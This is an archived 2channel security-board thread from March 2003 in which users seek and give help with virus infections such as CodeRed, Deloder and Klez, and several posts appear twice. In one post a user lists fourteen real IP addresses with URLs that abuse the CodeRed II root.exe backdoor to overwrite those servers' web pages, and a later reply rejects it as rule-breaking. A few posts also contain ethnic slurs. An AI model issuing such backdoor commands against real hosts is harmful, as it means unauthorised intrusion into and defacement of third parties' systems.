ウィルスバスター の検索結果で BAT_FOEOAPC.J ってのが
見つかったと言われたが、こんな名前のウィルス情報、何処
にも無いんですが…なんじゃろか?
見つかったと言われたが、こんな名前のウィルス情報、何処
にも無いんですが…なんじゃろか?
318 :名無しさん@お腹いっぱい。:03/03/11 23:51
>>316
お前、リモート操作ソフトは VNC だけだと思ってるのかと小一時間。。。
お前、リモート操作ソフトは VNC だけだと思ってるのかと小一時間。。。
319 :名無しさん@お腹いっぱい。:03/03/12 00:08
320 :名無しさん@お腹いっぱい。:03/03/12 09:55
age
321 :名無しさん@お腹いっぱい。:03/03/12 10:44
ttp://playstation2.hotgames.com/games/ringof/readme.eml
このウィルスにひっかかってしまったのですが、ウイルスバスターなどない場合どうすればいいですか?
今のところ特に以上ナシです、。
このウィルスにひっかかってしまったのですが、ウイルスバスターなどない場合どうすればいいですか?
今のところ特に以上ナシです、。
322 :名無しさん@お腹いっぱい。:03/03/12 11:02
>>321
ウィルス感染の可能性がある場合、直ちにネットワークから切断汁。
>>2>>6
やむを得ない場合はオンラインスキャン。
http://www.symantec.com/region/jp/securitycheck/index.html
http://www.trendmicro.co.jp/hcall/index.asp
今後はアンチウィルスソフトを常駐させておくこと。
ウィルス感染の可能性がある場合、直ちにネットワークから切断汁。
>>2>>6
やむを得ない場合はオンラインスキャン。
http://www.symantec.com/region/jp/securitycheck/index.html
http://www.trendmicro.co.jp/hcall/index.asp
今後はアンチウィルスソフトを常駐させておくこと。
323 :名無しさん@お腹いっぱい。:03/03/12 11:07
324 :名無しさん@お腹いっぱい。:03/03/12 11:15
>>323
今時、荷無駄に感染する馬鹿はあぼーんするのが世のため人のため。
今時、荷無駄に感染する馬鹿はあぼーんするのが世のため人のため。
326 :名無しさん@お腹いっぱい。:03/03/12 12:11
>>325
いまどきそんな会社、会社ごとあぼーんされろよ。
いまどきそんな会社、会社ごとあぼーんされろよ。
327 :名無しさん@お腹いっぱい。:03/03/12 12:37
なんか昨日から default.ida (nimda だったっけ) へのアクセスが
増えてるけど、なんでだろ?
増えてるけど、なんでだろ?
328 :名無しさん@お腹いっぱい。:03/03/12 12:43
/ ̄⌒⌒ヽ
| / ̄ ̄ ̄ヽ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| | / \| |
| | ´ ` | |
(6 つ / .| >>372 なんでだろう〜♪
| / /⌒⌒ヽ<
| \  ̄ ノ |
| / ̄ \_________
329 :名無しさん@お腹いっぱい。:03/03/12 13:06
330 :名無しさん@お腹いっぱい。:03/03/12 13:14
331 :名無しさん@お腹いっぱい。:03/03/12 13:15
>>326
そういう会社はえてして他のソフトにも予算をさかないから、会社ごとあぼーんも充分ある。
そういう会社はえてして他のソフトにも予算をさかないから、会社ごとあぼーんも充分ある。
332 :ぼるじょあ ◆yBEncckFOU :03/03/12 13:38
>>330
☆。:.+: /■\
.. :. ( ・3・ ) (・3・) なんでだろ〜なんでだろ♪
/ ̄ヽ/,― 、\ o。。。 なんでだ、なんでだろ〜♪
.:☆ | ||三∪●)三mΕ∃.
.:* \_.へ--イ\ ゚ ゚ ゚
+:..♪.:。゚*.:.. (_)(_) ☆。:.+:
☆。:.+::.. ☆:.°+ .. :
。*.:☆゚x*+゚。::.☆ο::.+。 *ρ
☆。:.+: /■\
.. :. ( ・3・ ) (・3・) なんでだろ〜なんでだろ♪
/ ̄ヽ/,― 、\ o。。。 なんでだ、なんでだろ〜♪
.:☆ | ||三∪●)三mΕ∃.
.:* \_.へ--イ\ ゚ ゚ ゚
+:..♪.:。゚*.:.. (_)(_) ☆。:.+:
☆。:.+::.. ☆:.°+ .. :
。*.:☆゚x*+゚。::.☆ο::.+。 *ρ
333 :名無しさん@お腹いっぱい。:03/03/12 13:41
334 :名無しさん@お腹いっぱい。:03/03/12 13:44
335 :名無しさん@お腹いっぱい。:03/03/12 14:28
W32/CodeRed.a.worm
http://vil.mcafee.com/dispVirus.asp?virus_k=99142
UPDATE March 11, 2003:
The W32/CodeRed.f variant has been seen in the wild.
This variant is almost identical to the .C variant.
http://vil.mcafee.com/dispVirus.asp?virus_k=99142
UPDATE March 11, 2003:
The W32/CodeRed.f variant has been seen in the wild.
This variant is almost identical to the .C variant.
336 :名無しさん@お腹いっぱい。:03/03/12 16:29
337 :名無しさん@お腹いっぱい。:03/03/12 16:55
今ごろになって…
米CERT/CCが「Deloder」ワームを警告,“弱い”パスワードのWindowsマシンが侵入される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030312/1/
米CERT/CCが「Deloder」ワームを警告,“弱い”パスワードのWindowsマシンが侵入される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030312/1/
338 :名無しさん@お腹いっぱい。:03/03/12 17:14
トレンドマイクロの方は Code Red II の情報ないね。
339 :名無しさん@お腹いっぱい。:03/03/12 17:55
ただいまシマンテックのオンラインウイルスチェック中
感染ファイル30に到達しました
DOS窓が開いてなんかしてたり
入れてもいないmIRCがどうこういうメッセージが出たり
ドクロマークのアイコンのついたWARPINGとかいうソフトが勝手に起動したりあ、さっきついにVNCのメッセージも出ました
やられたい放題だョ〜!
感染ファイル30に到達しました
DOS窓が開いてなんかしてたり
入れてもいないmIRCがどうこういうメッセージが出たり
ドクロマークのアイコンのついたWARPINGとかいうソフトが勝手に起動したりあ、さっきついにVNCのメッセージも出ました
やられたい放題だョ〜!
340 :名無しさん@お腹いっぱい。:03/03/12 17:56
それを言うなら「やられ放題」だろうが。
341 :名無しさん@お腹いっぱい。:03/03/12 17:58
342 :名無しさん@お腹いっぱい。:03/03/12 18:13
ブラクラをうっかり踏んで以降、IEがおかしいです
指定したのと違うページに飛んでしまいます
オンラインウィルススキャンやウィルスバスターのお試し版では
探せなかったのですが、なんとか直す方法無いでしょうか?
指定したのと違うページに飛んでしまいます
オンラインウィルススキャンやウィルスバスターのお試し版では
探せなかったのですが、なんとか直す方法無いでしょうか?
343 :名無しさん@お腹いっぱい。:03/03/12 18:17
>>342
IE再インストールじゃだめなの?
IE再インストールじゃだめなの?
344 :名無しさん@お腹いっぱい。:03/03/12 18:18
>>342
ウィルスとは限らないから、ウィルススキャンしても意味ないことがある。
ttp://homepage2.nifty.com/winfaq/c/ietrouble.html#370
今度からは踏む前にブラクラチェッカーhttp://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
使ったり、IEの設定を見直すこと。
ウィルスとは限らないから、ウィルススキャンしても意味ないことがある。
ttp://homepage2.nifty.com/winfaq/c/ietrouble.html#370
今度からは踏む前にブラクラチェッカーhttp://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
使ったり、IEの設定を見直すこと。
IEの修復も試してみれ。
346 :339:03/03/12 18:34
結局30個のファイルが感染してました
Backdoor.IRC.Zcrew がたくさん
IRC Trojan
Trojan Horse
Hacktool.Flooder など
環境は Win2000、アカウントはAdminstratorのまま、ケーブル接続。
親と弟がメールをやっているので、そこから侵入した可能性あり。
面倒なのでフォーマットしてOS再インストールします。
Backdoor.IRC.Zcrew がたくさん
IRC Trojan
Trojan Horse
Hacktool.Flooder など
環境は Win2000、アカウントはAdminstratorのまま、ケーブル接続。
親と弟がメールをやっているので、そこから侵入した可能性あり。
面倒なのでフォーマットしてOS再インストールします。
347 :名無しさん@お腹いっぱい。:03/03/12 18:36
348 :名無しさん@お腹いっぱい。:03/03/12 18:41
そんなことよりも、脳波がヤバいので、逝ってきます
349 :名無しさん@お腹いっぱい。:03/03/12 18:42
Σ(゚д゚lll)
350 :bloom:03/03/12 18:45
351 :名無しさん@お腹いっぱい。:03/03/12 19:08
352 :342:03/03/12 22:55
その時はIEの修復してみました
昨日はそれで直っていたのですが、今日同じ時間に
同じような症状が出てこりゃやられたのかなと焦りまして
アドレスを直接書き込んでも、ランダムにいろんなページに飛ぶような
たとえばこの板の再読み込みしようとしたらTBSのサイトに飛んだり
チェッカーにかけてみたら、そのブラクラサイトVBS_MERASH.Aがあったようなんですが
単にIEが壊れただけなんでしょうか…
昨日はそれで直っていたのですが、今日同じ時間に
同じような症状が出てこりゃやられたのかなと焦りまして
アドレスを直接書き込んでも、ランダムにいろんなページに飛ぶような
たとえばこの板の再読み込みしようとしたらTBSのサイトに飛んだり
チェッカーにかけてみたら、そのブラクラサイトVBS_MERASH.Aがあったようなんですが
単にIEが壊れただけなんでしょうか…
353 :名無しさん@お腹いっぱい。:03/03/12 22:57
>>352
メモ帳使いなよ、超軽くていいよ。
メモ帳使いなよ、超軽くていいよ。
354 :名無しさん@お腹いっぱい。:03/03/13 08:20
CodeRed.Fでシマンテックのセキュリティアラートでてるね。
http://www.symantec.com/region/jp/
http://www.symantec.com/region/jp/sarcj/data/c/codered.f.html
トレンドマイクロもイエローアラート。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CODERED.F
http://www.nai.com/japan/virusinfo/virC.asp?v=W32/CodeRed.f.worm
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030312/2/
http://www.symantec.com/region/jp/
http://www.symantec.com/region/jp/sarcj/data/c/codered.f.html
トレンドマイクロもイエローアラート。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CODERED.F
http://www.nai.com/japan/virusinfo/virC.asp?v=W32/CodeRed.f.worm
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030312/2/
355 :名無しさん@お腹いっぱい。:03/03/13 08:48
しかし、ふつーにウィルス対策してればCodeRed.Fなんて広まるわけないんだが……
356 :名無しさん@お腹いっぱい。:03/03/13 09:00
>>355
以前の定義ファイルで引っかかるわけだしね。なんでだろ。
以前の定義ファイルで引っかかるわけだしね。なんでだろ。
357 :名無しさん@お腹いっぱい。:03/03/13 09:30
Apacheのログ見たら、昨日だけで13発のCodeRed II様が御来訪。
Nタイプの感染活動期には、多い時でも一日あたり3〜4発くらい。(昨日は1発だけ)
感染活動に新技を繰り出してくるわけでもないのに、
どうしてIIが広まってるのか、本当に不思議だね。
IISのパッチ当てずに、半端なワクチンだけで防いでたヤツがやられてるのかな?
Nタイプの感染活動期には、多い時でも一日あたり3〜4発くらい。(昨日は1発だけ)
感染活動に新技を繰り出してくるわけでもないのに、
どうしてIIが広まってるのか、本当に不思議だね。
IISのパッチ当てずに、半端なワクチンだけで防いでたヤツがやられてるのかな?
358 :名無しさん@お腹いっぱい。:03/03/13 09:54
緊張感の緩んだ端境期に鯖起てた人とか
359 :名無しさん@お腹いっぱい。:03/03/13 13:57
また半島か?
360 :名無しさん@お腹いっぱい。:03/03/13 14:01
南北馬鹿半島&中国
361 :名無しさん@お腹いっぱい。:03/03/13 15:13
うちは昨日だけでも100回くらい来訪、
どうやら半島系が多いみたい
中にはAhooBBも(w
どうやら半島系が多いみたい
中にはAhooBBも(w
362 :名無しさん@お腹いっぱい。:03/03/13 15:27
363 :名無しさん@お腹いっぱい。:03/03/13 16:39
WinXPのHomeEditionは、SafeモードじゃないとAdministratorにはならないんでしょ?
だったらDELODER平気じゃない??違うの??
だったらDELODER平気じゃない??違うの??
364 :名無しさん@お腹いっぱい。:03/03/13 16:43
365 :名無しさん@お腹いっぱい。:03/03/13 17:03
>>363
お前みたいな馬鹿がいるから…(鬱
お前みたいな馬鹿がいるから…(鬱
366 :名無しさん@お腹いっぱい。:03/03/13 17:17
>>365
お前もな(w
お前もな(w
367 :名無しさん@お腹いっぱい。:03/03/13 18:10
age
368 :名無しさん@お腹いっぱい。:03/03/13 18:35
pley.exe 、valent[1].jpg、仕事でメールアドレス晒してると
いらん添付ファイルが送られてきて鬱だ。
いらん添付ファイルが送られてきて鬱だ。
369 :名無しさん@お腹いっぱい。:03/03/13 23:15
age
370 :名無しさん@お腹いっぱい。:03/03/13 23:37
>>361
やり返せ!
view-source:http://218.14.47.235/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://200.82.153.179/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://200.204.68.125/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://61.64.194.148/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://203.94.68.166/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://161.77.36.168/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://12.242.174.219/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://194.230.248.106/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://203.162.122.156/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://218.62.170.128/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://64.146.28.203/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://218.11.130.97/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://218.11.130.212/scripts/root.exe?/c+echo+itteyoshi+>+d:\inetpub\wwwroot\iisstart.asp
view-source:http://200.69.228.169/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
やり返せ!
view-source:http://218.14.47.235/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://200.82.153.179/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://200.204.68.125/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://61.64.194.148/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://203.94.68.166/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://161.77.36.168/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://12.242.174.219/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://194.230.248.106/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://203.162.122.156/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://218.62.170.128/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://64.146.28.203/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://218.11.130.97/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://218.11.130.212/scripts/root.exe?/c+echo+itteyoshi+>+d:\inetpub\wwwroot\iisstart.asp
view-source:http://200.69.228.169/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
371 :名無しさん@お腹いっぱい。:03/03/14 00:02
hhp://ime.nu/imu.nu/ime.nu/zone.cside.com/asobi/kiken/a/a2.htm
を踏んだら、ネットワークには繋がるのにどのアドレスを入れても
ページが表示されません泣
ほんとに困ってます。誰かアドバイスお願いします!!
を踏んだら、ネットワークには繋がるのにどのアドレスを入れても
ページが表示されません泣
ほんとに困ってます。誰かアドバイスお願いします!!
372 :名無しさん@お腹いっぱい。:03/03/14 01:03
>>371
ウイルスチェック
ウイルスチェック
373 :名無しさん@お腹いっぱい。:03/03/14 08:36
>>370
ローカルルール違反。板TOP参照。
ローカルルール違反。板TOP参照。
374 :何でだろう?:03/03/14 12:43
板違い、または既出済かもしれません。その時は誘導願います。
週末の昼頃になると必ず(3週続けて)メールの「送信」が出来なくなってしまいます。
(エラーメッセージはでません。「送信メッセージ」フォルダにメールが残った状態で正常に終わります。)
ネットワーク上に10台程WinPCがあるのですが、その1台だけがトラブリます。
そして週明けになると何事もなかったように直ります。
多方面から原因を調べているのですが、もしかしたら「トロイ木馬」系かな…と思い質問しに来ました。
こんなウイルスorトロイってありますか?
環境はWin98 OE5 ISDN回線です。
よろしくお願いします。
週末の昼頃になると必ず(3週続けて)メールの「送信」が出来なくなってしまいます。
(エラーメッセージはでません。「送信メッセージ」フォルダにメールが残った状態で正常に終わります。)
ネットワーク上に10台程WinPCがあるのですが、その1台だけがトラブリます。
そして週明けになると何事もなかったように直ります。
多方面から原因を調べているのですが、もしかしたら「トロイ木馬」系かな…と思い質問しに来ました。
こんなウイルスorトロイってありますか?
環境はWin98 OE5 ISDN回線です。
よろしくお願いします。
375 :名無しさん@お腹いっぱい。:03/03/14 12:52
376 :何でだろう?:03/03/14 13:03
377 :名無しさん@お腹いっぱい。:03/03/14 13:10
379 :名無しさん@お腹いっぱい。:03/03/14 14:35
>週末の昼頃になると必ず(3週続けて)メールの「送信」が出来なくなってしまいます
おーい誰かこんな下らないウィルス作る暇な奴いるか〜?
おーい誰かこんな下らないウィルス作る暇な奴いるか〜?
380 :名無しさん@お腹いっぱい。:03/03/14 15:53
381 :名無しさん@お腹いっぱい。:03/03/14 16:52
age
382 :sainary:03/03/15 00:42
Backdoor.Dvldr にやられて
ファイル削除したのに正常終了しなくなりました。
どうしたらよいかわかりません。
ご存知の方いらっしゃれば教えてください。
ファイル削除したのに正常終了しなくなりました。
どうしたらよいかわかりません。
ご存知の方いらっしゃれば教えてください。
383 :名無しさん@お腹いっぱい。:03/03/15 00:55
この度でろだに感染。
初心者なのでまったくわけがわからず業者に頼んで駆除
してもらいました。
甘えん坊な私は逝って来ます・・・。
初心者なのでまったくわけがわからず業者に頼んで駆除
してもらいました。
甘えん坊な私は逝って来ます・・・。
384 :名無しさん@お腹いっぱい。:03/03/15 06:47
>>383
自分で下手にいじってパソコンぶっ壊すよりは数倍マシだと思う
自分で下手にいじってパソコンぶっ壊すよりは数倍マシだと思う
385 :名無しさん@お腹いっぱい。:03/03/15 06:52
俺もそう思う。
386 :名無しさん@お腹いっぱい。:03/03/15 06:59
すみません、教えて下さい。
トレンドマイクロのオンラインスキャンを試したところ、TROJ_DELWINDという
ウィルスに感染していると出ました。
しかし上記サイトやマカフィーのウィルス情報には載っていませんでした。
ググるとひとつだけそれらしいリストに「TROJ_DELWIND.A」という名前で
出ているだけです。
もし対処方法をご存知の方がいらっしゃいましたら、教えて頂けませんでしょうか?
環境はXP、2000Proのデュアルブートです。
トレンドマイクロのオンラインスキャンを試したところ、TROJ_DELWINDという
ウィルスに感染していると出ました。
しかし上記サイトやマカフィーのウィルス情報には載っていませんでした。
ググるとひとつだけそれらしいリストに「TROJ_DELWIND.A」という名前で
出ているだけです。
もし対処方法をご存知の方がいらっしゃいましたら、教えて頂けませんでしょうか?
環境はXP、2000Proのデュアルブートです。
387 :名無しさん@お腹いっぱい。:03/03/15 08:04
>>386おそらく単なるシステムファイルとかHDD破壊系のトロイ
感染も増殖もしないから該当ファイルを削除
http://www.pestpatrol.com/PestInfo/db/d/delwindows_trojan.asp
>>384ぶっ壊して馬鹿がPC使わなくなる方が平和でいい。
感染も増殖もしないから該当ファイルを削除
http://www.pestpatrol.com/PestInfo/db/d/delwindows_trojan.asp
>>384ぶっ壊して馬鹿がPC使わなくなる方が平和でいい。
388 :名無しさん@お腹いっぱい。:03/03/15 08:22
389 :名無しさん@お腹いっぱい。:03/03/15 14:18
390 :名無しさん@お腹いっぱい。:03/03/15 16:40
age
あぼーん
392 :名無しさん@お腹いっぱい。:03/03/15 16:46
>>391
ウィルス持って無いから由見かおるの肛門パンティ送っときますた。
ウィルス持って無いから由見かおるの肛門パンティ送っときますた。
393 :名無しさん@お腹いっぱい。:03/03/15 16:59
>この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
>様々なネット上の危険からの防御法や対策を語りあうための板です。
>掲示板の荒らし方や侵入の方法、メールボムの送り方等、
>攻撃方法の質問はご遠慮下さい。
>2ちゃんねるでは荒らし依頼は出来ません。
>また、この板ではアタック依頼は受け付けません。
>攻撃依頼を見かけた方は、放置してください。
>様々なネット上の危険からの防御法や対策を語りあうための板です。
>掲示板の荒らし方や侵入の方法、メールボムの送り方等、
>攻撃方法の質問はご遠慮下さい。
>2ちゃんねるでは荒らし依頼は出来ません。
>また、この板ではアタック依頼は受け付けません。
>攻撃依頼を見かけた方は、放置してください。
394 :名無しさん@お腹いっぱい。:03/03/15 21:34
age
395 :名無しさん@お腹いっぱい。:03/03/16 00:28
昨日・今日と続けざまにKlez.H@mmが送られてくるのですが、
これのメールのFromが全部president*@whitehouse.govなんですよね。
(*部分はそれぞれ違う)
もちろんヘッダの「Received: from」のドメインはwhitehouse.govなんかじゃないわけですが。
Klez.H@mmってこんな偽装するんでしたっけ?
これのメールのFromが全部president*@whitehouse.govなんですよね。
(*部分はそれぞれ違う)
もちろんヘッダの「Received: from」のドメインはwhitehouse.govなんかじゃないわけですが。
Klez.H@mmってこんな偽装するんでしたっけ?
396 :名無しさん@お腹いっぱい。:03/03/16 00:59
>>395
KlezはFromを偽装する。
KlezはFromを偽装する。
ありがとうございます。
言葉が足りなくて住みません。
From偽装するのは知ってたんですが、4〜5通着たすべてFromが「president*@whitehouse.gov」なので、あれれ?と思ったのです。
亜種かなぁ?とか・・・。
単なる偶然ですかね。
言葉が足りなくて住みません。
From偽装するのは知ってたんですが、4〜5通着たすべてFromが「president*@whitehouse.gov」なので、あれれ?と思ったのです。
亜種かなぁ?とか・・・。
単なる偶然ですかね。
398 :名無しさん@お腹いっぱい。:03/03/16 04:39
2chでウイルスを貼ってあるリンク対策でいい方法があれば教えて下さい。
399 :名無しさん@お腹いっぱい。:03/03/16 05:00
2chに繋げない
400 :名無しさん@お腹いっぱい。:03/03/16 09:39
http://www2.strangeworld.org/uedakana/sahra6138.jpg
これ踏んでしまったのだけどどうやらウィルスらしく
マイコンピューターにアクセスするたびに例外が発生して再起動くらいます。
オンラインスキャンをやろうとしたところスキャン事態マイコンピューターにアクセスするため
例外が発生してウィルスを削除できません。
どうすればいいのでしょうか?教えて下さい
一応インターネット一時ファイルの削除はしましたがまだ例外が発生します。
これ踏んでしまったのだけどどうやらウィルスらしく
マイコンピューターにアクセスするたびに例外が発生して再起動くらいます。
オンラインスキャンをやろうとしたところスキャン事態マイコンピューターにアクセスするため
例外が発生してウィルスを削除できません。
どうすればいいのでしょうか?教えて下さい
一応インターネット一時ファイルの削除はしましたがまだ例外が発生します。
401 :名無しさん@お腹いっぱい。:03/03/16 09:56
>>400単なるブラクラなんだけどなぁ・・・
crashmeをウィルス認定なんかしてるのはトレンドマイクロだけだし。
例外云々はWindowsならそのうち起きるもんだし
嘘だと思うならViewsourceで見てみれば?
ってことを何遍言っただろうか。ふぅ
crashmeをウィルス認定なんかしてるのはトレンドマイクロだけだし。
例外云々はWindowsならそのうち起きるもんだし
嘘だと思うならViewsourceで見てみれば?
ってことを何遍言っただろうか。ふぅ
402 :名無しさん@お腹いっぱい。:03/03/16 11:08
怪しいリンクはブラクラチェッカで(略
403 :名無しさん@お腹いっぱい。:03/03/16 16:21
ブラクラチェッカ
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
なお、ノートンインターネットセキュリティを使っている人は、
cgi.coara.or.jpにリファラを返すよう設定したうえでブラクラチェッカ
を使ってください。
http://service1.symantec.com/SUPPORT/INTER/nisjapanesekb.nsf/jp_docid/20021020160209947
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
なお、ノートンインターネットセキュリティを使っている人は、
cgi.coara.or.jpにリファラを返すよう設定したうえでブラクラチェッカ
を使ってください。
http://service1.symantec.com/SUPPORT/INTER/nisjapanesekb.nsf/jp_docid/20021020160209947
404 :名無しさん@お腹いっぱい。:03/03/16 16:55
パケットの送信が勝手に増えるんです。
ウイルスバスターで検索しても何も出てきません。
これって、なんなんでしょうか?
ウイルスバスターで検索しても何も出てきません。
これって、なんなんでしょうか?
405 :名無しさん@お腹いっぱい。:03/03/16 17:50
>>404
どこへの送信が増えてるのか分からないので、コメント出来ません。
どこへの送信が増えてるのか分からないので、コメント出来ません。
406 :名無しさん@お腹いっぱい。:03/03/16 17:59
[email protected][email protected]@hotmail.com
407 :404:03/03/16 19:56
どうやって調べたら良いのでしょうか
408 :名無しさん@お腹いっぱい。:03/03/16 20:41
>>404 windump
409 :名無しさん@お腹いっぱい。:03/03/16 22:41
410 :名無しさん@お腹いっぱい。:03/03/16 22:55
age
411 :名無しさん@お腹いっぱい。:03/03/16 23:37
CodeRed、かなりたくさん来てるね
412 :404:03/03/17 00:00
やってみたけど、なにも起動していない状態で、すごい勢いでスクロールして読み取れない。
読んでもわからないけどね。
どしたらいいですか?
読んでもわからないけどね。
どしたらいいですか?
413 :名無しさん@お腹いっぱい。:03/03/17 11:17
age
414 :名無しさん@お腹いっぱい。:03/03/17 12:22
すみません、ノートン先生がいくつかウィルスを検出してくれるのですが、
どう対処したら判らないので…ご存知の方がおられましたら、アドバイスお願いします。
■オブジェクト名 C:\WINNT\Fonts\rundll32.exe
■ウィルス名 Backdoor.Dvldr
■適用した処理 ファイルを修復できません
…フォントフォルダ内なので、検出されたファイルを削除したりすればOKかな?と思ったのですが、
そのファイルが見当たらないので削除できないのです…。
■オブジェクト名 C:\WINNT\Fonts\rundll32.exe
■ウィルス名 Backdoor.Dvldr
■適用した処理 ファイルへのアクセスが拒否されました
…同上。
何度も検出されるので、困っています…
どう対処したら判らないので…ご存知の方がおられましたら、アドバイスお願いします。
■オブジェクト名 C:\WINNT\Fonts\rundll32.exe
■ウィルス名 Backdoor.Dvldr
■適用した処理 ファイルを修復できません
…フォントフォルダ内なので、検出されたファイルを削除したりすればOKかな?と思ったのですが、
そのファイルが見当たらないので削除できないのです…。
■オブジェクト名 C:\WINNT\Fonts\rundll32.exe
■ウィルス名 Backdoor.Dvldr
■適用した処理 ファイルへのアクセスが拒否されました
…同上。
何度も検出されるので、困っています…
415 :名無しさん@お腹いっぱい。:03/03/17 12:35
416 :名無しさん@お腹いっぱい。:03/03/17 12:37
417 :名無しさん@お腹いっぱい。:03/03/17 12:40
Backdoorキタ─wwヘ√レvvw─(゚∀゚)─wwヘ√レvv─!!!!
418 :名無しさん@お腹いっぱい。:03/03/17 12:44
Backdoorキマシタ─wwヘ√レvvw─(゚∀゚)─wwヘ√レvv─!!!!
おかげさまで解決しました。
本当にありがとうございます。
おかげさまで解決しました。
本当にありがとうございます。
419 :名無しさん@お腹いっぱい。:03/03/17 13:20
起動するとCドライブ全消去みたいなexeファイルってウイルスバスターとかで対処できますか?
その対処も、exeファイル自体にウイルス検索をかけるのか、exeを実行したあと全体にかけるのか・・・
てかこの場合ウイルスとは言わないんですかね?
あとドライブ上に勝手にフォルダを作ってウイルスを作るような内容のプログラムが入ってるexeファイルの場合は
そのexeファイル自体を検索しても意味無いんですか?
その対処も、exeファイル自体にウイルス検索をかけるのか、exeを実行したあと全体にかけるのか・・・
てかこの場合ウイルスとは言わないんですかね?
あとドライブ上に勝手にフォルダを作ってウイルスを作るような内容のプログラムが入ってるexeファイルの場合は
そのexeファイル自体を検索しても意味無いんですか?
420 :名無しさん@お腹いっぱい。:03/03/17 13:41
>>419
ウィルスではないので、基本的にアンチウィルスソフトでは検知できません。
ただし、ベンダーによっては対応しているものも一部ある。
そういうファイルってMXとかで自分の意思でダウソして実行してるんでしょ。
http://pc.2ch.net/sec/kako/1024/10249/1024943662.html
ウィルスではないので、基本的にアンチウィルスソフトでは検知できません。
ただし、ベンダーによっては対応しているものも一部ある。
そういうファイルってMXとかで自分の意思でダウソして実行してるんでしょ。
http://pc.2ch.net/sec/kako/1024/10249/1024943662.html
421 :名無しさん@お腹いっぱい。:03/03/17 14:46
>>419ウィルスじゃなくってトロイ
WinnyやMXのファイル交換ソフトにおいて、それも日本人の間で流行してるから
日本で一般向けにそれなりのシェアを持ってるベンダーでは対応してるが
もっとも自動でファイル削除する方法なんていくらでもあるので
その全てを検出できるかは知らん。
これ以上はダウソ板の親切な人にでも聞いてください。
WinnyやMXのファイル交換ソフトにおいて、それも日本人の間で流行してるから
日本で一般向けにそれなりのシェアを持ってるベンダーでは対応してるが
もっとも自動でファイル削除する方法なんていくらでもあるので
その全てを検出できるかは知らん。
これ以上はダウソ板の親切な人にでも聞いてください。
422 :名無しさん@お腹いっぱい。:03/03/17 21:40
3月5日から解凍ソフトの「LHASA」を奨めるようなウイルスメールが来るようになりました。
ソースを見ると
Received: from mx2.******.or.jp (YahooBB219210076104.bbtec.net [219.210.76.104])
とか(私は屋ふーBBじゃない)
Subject: LHASA
本文は
LHA & Zip extractor "Lhasa" ver0.17
一.はじめに
Lhasa は「らさ」と読んでください。・・・(略)
となっています。
またReturn-Path:が私のメールアドレスになっていてUndelivered Mailが届くようにもなりました。
そのメールは
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
となっているのですが私のアウトルックのバージョンとは違います。
安置ウイルスのメーカーページを見たのですがそのような内容は見当たりませんでした。
ちなみにウイルスは緑のハートのアイコンでした。
ソースを見ると
Received: from mx2.******.or.jp (YahooBB219210076104.bbtec.net [219.210.76.104])
とか(私は屋ふーBBじゃない)
Subject: LHASA
本文は
LHA & Zip extractor "Lhasa" ver0.17
一.はじめに
Lhasa は「らさ」と読んでください。・・・(略)
となっています。
またReturn-Path:が私のメールアドレスになっていてUndelivered Mailが届くようにもなりました。
そのメールは
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
となっているのですが私のアウトルックのバージョンとは違います。
安置ウイルスのメーカーページを見たのですがそのような内容は見当たりませんでした。
ちなみにウイルスは緑のハートのアイコンでした。
423 :名無しさん@お腹いっぱい。:03/03/17 22:25
